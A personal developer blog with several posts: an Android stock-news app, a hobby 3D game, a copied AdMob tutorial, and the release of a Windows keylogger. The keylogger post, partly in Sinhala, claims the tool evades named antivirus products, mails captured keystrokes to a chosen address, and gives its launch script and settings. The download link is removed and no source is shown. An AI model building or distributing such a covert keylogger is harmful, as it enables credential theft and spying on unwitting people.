CSE Watch 2.0 released with vast improvements!



Direct Link : CSEWatch.Apk

Download APK via QR Reader

qrcode



Available in Android Market 

 CSE Watch - Latest News - Version 2.0 
Download Now!


UltraX-KeyLogger for Windows

 [Educational Purpose Only]


Well today im releasing a Damn interesting Application.. its a Keylogger!! yes a Malware!! this is ma first attempt to create a malware which I have researched for nearly 3 months with ma colleague maduraX86. we hv tried to accomplish this using C++, python and well soo many ways. but aftr all those gone vain. I hv started writing this using a Combination of two languages. well its C++ and Java.

This is not just a Keylogger its powdered with an Emailer too!! thats the bonus feature on it!!

Sorry Link Removed!

________________________________________________________

 
මචංලා මේ තීන්නෙ මගෙ අලුත්ම නිර්මාණය.. 

UltraX-KeyLogger for Windows
 
Malware එකක් නම් තමයි. බට් ඉතිං ඕන වෙන තැන් එහෙම ඕගොල්ල දන්නව ඇතිනේ..
මෙහෙමයි Keylogger එකක් කිවවට මේක නෝමල් Keylogger එහෙකට වඩා වටින Feature එකක් තීනව, eMailer එකක් Inbuilt. ඒ නිසා Log එක කෙලින්ම ඔයාගෙ Email Address එකට Receive වෙනව. Email receive වෙන කාලපරාසය Adjust කරගන්නත් පුලුවනි
දැනට කිසි අවුලක් නැතුව MS Security Essentials, Avast, AVG, Avira වගෙ Antivirus guard යටත් එලකිරි වගෙ බඩු වැඩ..
මේකෙ මගෙ Malware Scripts මුකුත් නැහැ.. තනිකරම මේකෙ Log එක යන්නෙ ඔයා දාන Email Address එකට නිසා කිසිම අවුලක් වෙන්නෙ නෑ.. බය නැතුව යූස් කරල බලන්න.
ට්‍රයි එකක් දාල Bugs එහෙම කියනවනම් ලොකු දෙයක්.. දැනට නම් කියන්න තරම් ලොකු Bug එකක් නැහැ.. මේකෙ පොඩි අවුලක් තීන්නෙ මේක වැඩ කරන්න ඒ Run වෙන Machine එකෙ Java දාල තීන්න ඕනි.. නැත්තම් Email part එකට සීන් වෙනව. නමුත් දැන් ගොඩක් දෙනෙක් Machines වලට Java දාගන්න නිසා ඒකත් ලොකු ප්‍රශ්නයක් වෙන එකක් නැහැ..
 


Sorry Link Removed!
 

README File
############################################
        UltraXKeyLogger v0.5
############################################

---------------------------
Prerequisites 
---------------------------
(01)    Java
---------------------------
Configuring the KeyMailer
---------------------------
Right Click the "start.bat" and open it with NotePad++ or whatever suitable editor you have!

Ok now you will see this text on it!
 
------------------------------------
@echo off
cd dist
start Logger.exe & start javaw -jar KeyMailer.jar testEmail@gmail.com 5000
@echo on
------------------------------------
We have to modify few parameters in the 3rd line in order to recieve logs for relavant email Address.

-----------------------------------
start Logger.exe & start javaw -jar KeyMailer.jar testEmail@gmail.com 5000
------------------------------------

well!! I will explain lil bit.

------------------------------------
start Logger.exe & start javaw -jar KeyMailer.jar <Log Recievers Email Address> <Email log recieving time delay>
------------------------------------

*Log Recievers Email Address : put an email of your choice this will reeive the logs.

*Email log recieving time delay: the time delay for a Log after a log. [1000 = 1 Second] so this default value implies 5 Seconds.
if you need like a 10 Min delay then it should be 1000 X 60 X 10 = 600000 not 1000*60*10 you should calulate it and giv the final value to it. jz said thats it. xD

So Adjust them as you like! Save the File properly, And then Jz Run the same "start.bat"
You have just started the Keylogger!! 

Just hit some buttons and check your mails.
Voila!! you should recieved the KeyLog!! xD

Halo DuraX - "The 13th Floor Warfare"

 
Game Trailer 
 
 
  Halo DuraX - "The 13th Floor Warfare"
- 3D First Person Shooting Game -

well guyz!! This is ma 1st ever 3D Game. Actually this is just an Attempt to create a Game with ma Colleague DragonDilshan [who is one of our Game Designing Guru @DropMarsRecords Ltd] The game is called DuraX (not Durex btw :p) Shortened my nick then jz added some X thing to bring some momentum!!

Well guyz this is perfectly tested under 2.5GHz Core2Duo Processor, 2GB RAM, 128MB VGA. So I am pretty sure that it will work on mosts of PCs under your great System Arrangements!!

Well guyz finally Good luck with, The Game DuraX - "The 13th Floor Warfare"
Its not that much hard and that much nicer, this is just an Attempt..
Thanks for playing...

Download Link [108MB] : http://www.mediafire.com/?6088m88c0v623b5
 

Add Google Admob in Android Application

Ref : http://android.jmsliu.com/209/add-google-admob-in-android-application.html
______________________

Admob is a new way to monetize mobile applications. Currently, it supports multi-platform, including iPhone, Android, WebOS, and Flash Lite. Here I will show you how to integrate Admob in your android applications.

First, we need to go to the Admob website to register an account, in order to get the Admod account ID.
Second, let’s go the google code to download the latest Google AdMob Ads SDK for android. You also can get download it from your admob “Sites & Apps” setting page. After we get the AdMob SDK, we need to add the jar in our android application Build Path. Then, you just need to put some simple codes to show your ads in your applications.
1. For Admob, it’s better to add the com.google.ads.AdActivity in your Manifest.xml file. And don’t forget to add the user permission for it. Below is my mainfest.xml example.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
      package="com.jms.AdmobExample"
      android:versionCode="1"
      android:versionName="1.0">
    <uses-sdk android:minSdkVersion="8"/>
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:name=".AdmobExample"
                  android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name="com.google.ads.AdActivity"
                      android:configChanges="keyboard|keyboardHidden|orientation"/>
    </application>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>

2. The basic class in android applications are composed of View objects. For Admob, we need use AdView class which is provided in the SDK jar file. Actually, it will be put into the main layout file, it’s easy for you to build your own layout. Let’s see my main.xml:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:orientation="vertical"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    >
<ImageView
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:src="@drawable/a"
    />
<com.google.ads.AdView
    xmlns:ads="http://schemas.android.com/apk/res/com.jms.AdmobExample"
    android:id="@+id/adView"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    ads:adSize="BANNER"
    ads:adUnitId="a14dbba084368db"
/>
</LinearLayout>

3. Add the following code in your res/values/attrs.xml file:


1
2
3
4
5
6
7
8
9
10
11
12
<?xml version="1.0" encoding="utf-8"?>
<resources>
  <declare-styleable name="com.google.ads.AdView">
      <attr name="adSize">
          <enum name="BANNER" value="1"/>
          <enum name="IAB_MRECT" value="2"/>
          <enum name="IAB_BANNER" value="3"/>
          <enum name="IAB_LEADERBOARD" value="4"/>
      </attr>
      <attr name="adUnitId" format="string"/>
  </declare-styleable>
</resources>

4. Then, the last step is to add the following in your Activity class:

1
2
3
4
5
AdView adview = (AdView)findViewById(R.id.adView);
AdRequest re = new AdRequest();
re.setTesting(true);
re.setGender(AdRequest.Gender.FEMALE);
adview.loadAd(re);

There are a most important things you need to know:
  • At the first time, the Admob Ads will take 1 or 2 minutes to show.
  • In the simulator, I never try it successfully (As Alan Jay Weiner‘s solution, it maybe because I have two INCs, internet adapter, in my computer. His solution is that disable all other NICs in computer, only leave one INC working which can access the internet, and restart the emulator. Then, it will work properly. Thanks Alan. ). I always get the time out error. I only try it in my HTC Desire, and it really works.
  • Some times, it will show no ads to show. It’s not the problem, because it really doesn’t have ads to show for some situations.
I will put my final apk file for you to try, and also you can download my source code here. Have fun
__________

Download APK File
Download source code

CSE Watch - for Android Gingerbread+ versions

Colombo Stock Exchange Watch - Latest News

Hello Guys,
This is my first useful Android Application. lol. It can be very useful for the people who mostly cope with Share market. This app is simple, it will show the latest Share market News on your Droid Screen.

Btw I thought to Add this (useful) App on Google's Android appmart place called market.android.com. Omg! I was amazed. They were asking 25$ to Join the App publishers Community. So I just ignored it for awhile and published it here. Published in my very own place.lol

Anyway just telling about code. This App uses XML parser and it reads a RSS Feed and Shows it on the screen. :)  Thats the technology behind the screen. lol. KIT, I gonna develop this App into more deeper for our heartiest Stock Marketers. This app is specially for you guys!! :D

KIT
 - Harsha

DOWNLOAD > CSE WATCH.APK

_______________________________________________________________________________


DOWNLOAD via QR READER





qrcode

Screenshot